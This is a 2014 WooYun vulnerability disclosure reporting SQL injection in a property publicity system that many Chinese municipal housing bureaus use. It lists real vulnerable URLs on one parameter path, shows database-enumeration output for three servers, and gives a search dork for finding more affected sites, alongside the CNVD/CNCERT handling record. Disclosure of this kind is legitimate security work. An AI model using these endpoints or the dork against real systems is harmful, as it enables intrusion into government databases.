当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-060984

漏洞标题:某房产公示系统通用SQL注射(涉及全国多省市房产管理中心 房屋管理局)

相关厂商:某房产公示系统

漏洞作者: 雅柏菲卡

提交时间:2014-05-19 17:35

修复时间:2014-08-17 17:36

公开时间:2014-08-17 17:36

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-19: 细节已通知厂商并且等待厂商处理中
2014-05-24: 厂商已经确认,细节仅向厂商公开
2014-05-27: 细节向第三方安全合作伙伴开放
2014-07-18: 细节向核心白帽子及相关领域专家公开
2014-07-28: 细节向普通白帽子公开
2014-08-07: 细节向实习白帽子公开
2014-08-17: 细节向公众公开

简要描述:

.......

详细说明:

........

漏洞证明:

临邑县
http://222.133.15.182/bit-xxzs/xmlpzs/ysxkxxzs6.asp?permitsaleno=%C2%B3%C1%D9%B7%BF%D4%A4%CA%DB%D6%A4%B5%DA126%BA%C5
available databases [53]:
[*] AFSHIST
[*] AP
[*] ARCHIVE
[*] CHEAPPUBLICHOUSE
[*] CPHDIGITALSCAN
[*] CPHDIGITALSCANIMG
[*] CTXSYS
[*] DIGITALSCAN
[*] DIGITALSCANIMG
[*] HALFPUBLICHOUSE
[*] HPHDIGITALSCAN
[*] HR
[*] LIMITEDPRICEHOUSE
[*] MAINTAINFUND
[*] MDA
[*] MDSYS
[*] MFDIGITALSCAN
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PB
[*] PM
[*] PUBLISHMF
[*] PUBLISHTT
[*] PUBLISHTTFEHCASH
[*] PUBLISHTTSCHCASH
[*] PUBR
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] REGIST
[*] RMAN
[*] SCOTT
[*] SDE
[*] SH
[*] SHZH
[*] SYS
[*] SYSTEM
[*] TT
[*] TT_CONTRACT
[*] TTFEHCASH
[*] TTOWB
[*] TTSCHCASH
[*] WEBISSUE
[*] WKSYS
[*] WMSYS
[*] XDB
泰安市
http://www.tazzfdc.gov.cn/bit-xxzs/xmlpzs/ysxkxxzs6.asp?permitsaleno=%CC%A9%B7%BF%D4%A4%CA%DB%D6%A4%B5%DA(2014)011%BA%C5
available databases [45]:
[*] AFS
[*] AFSDIGITALSCAN
[*] AFSDIGITALSCANIMG
[*] AP
[*] APPRAISALINDUSTRYMGMT
[*] ARCHIVE
[*] BITXINTAI
[*] BROKERAGEINDUSTRYMGMT
[*] BSREGIST
[*] CTXSYS
[*] DBSNMP
[*] DEVCREDITMGMT
[*] DEVELOPER
[*] DIGITALSCAN
[*] DIGITALSCANIMG
[*] DMSYS
[*] DW_TT
[*] EXFSYS
[*] HOUSEPLATFORM
[*] MDSYS
[*] OA
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PB
[*] PPDIGITALSCAN
[*] PPDIGITALSCANIMG
[*] PROPERTY
[*] PUBLISHTTFEHCASH
[*] PUBR
[*] SCOTT
[*] SMSCLIENT
[*] SUPERVISE
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TOUCH
[*] TSMSYS
[*] TT
[*] TT_CONTRACT
[*] TTFEHCASH
[*] TWBOXDB
[*] WEBISSUE
[*] WMSYS
[*] XDB
未确定单位
http://123.7.180.231/bit-xxzs/xmlpzs/ysxkxxzs6.asp?permitsaleno=%D0%E9%C4%E2%D4%A4%CA%DB%D0%ED%BF%C9002
available databases [45]:
[*] AFS
[*] AFSDIGITALSCAN
[*] AFSDIGITALSCANIMG
[*] AP
[*] APPRAISALINDUSTRYMGMT
[*] ARCHIVE
[*] BITXINTAI
[*] BROKERAGEINDUSTRYMGMT
[*] BSREGIST
[*] CTXSYS
[*] DBSNMP
[*] DEVCREDITMGMT
[*] DEVELOPER
[*] DIGITALSCAN
[*] DIGITALSCANIMG
[*] DMSYS
[*] DW_TT
[*] EXFSYS
[*] HOUSEPLATFORM
[*] MDSYS
[*] OA
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PB
[*] PPDIGITALSCAN
[*] PPDIGITALSCANIMG
[*] PROPERTY
[*] PUBLISHTTFEHCASH
[*] PUBR
[*] SCOTT
[*] SMSCLIENT
[*] SUPERVISE
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TOUCH
[*] TSMSYS
[*] TT
[*] TT_CONTRACT
[*] TTFEHCASH
[*] TWBOXDB
[*] WEBISSUE
[*] WMSYS
[*] XDB
http://www.lwfccs.com/bit-xxzs/xmlpzs/ysxkxxzs6.asp?permitsaleno=%C0%B3%B7%BF%CA%DB%D7%D6%B5%DA000150%BA%C5
http://www.zmdfcxx.com/bit-xxzs/xmlpzs/ysxkxxzs6.asp?permitsaleno=%D7%A4%B7%BF%D7%D6%B5%DA20140048%BA%C5
http://www.bjsfdc.com.cn/bit-xxzs/xmlpzs/ysxkxxzs6.asp?permitsaleno=(2014)%B1%A6%CA%D0%B7%BF%D4%A4%CA%DB%D6%A4%B5%DA1181%BA%C5
http://gs.wf777.com/bit-xxzs/xmlpzs/ysxkxxzs6.asp?permitsaleno=%CE%AB2011%B7%BF%D4%A4%CA%DB%D6%A4%D7%D6%B5%DA00002864%BA%C5
还有很多 搜索关键词 “bit-xxzs/xmlpzs/ysxkxxzs6.asp?permitsaleno=”
https://www.google.com.hk/search?q=bit-xxzs/xmlpzs/ysxkxxzs6.asp%3Fpermitsaleno%3D&safe=strict&ei=G3t1U9jiPISQuASk4oDABA&start=20&sa=N&biw=1649&bih=891
还有很多页是一样的

修复方案:

..............

版权声明:转载请注明来源 雅柏菲卡@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-05-24 12:56

厂商回复:

根据所述情况,CNVD未直接测试所有案例,已经转由CNCERT下发给山东分中心,建议其测试后将政府案例进行处置。

最新状态:

暂无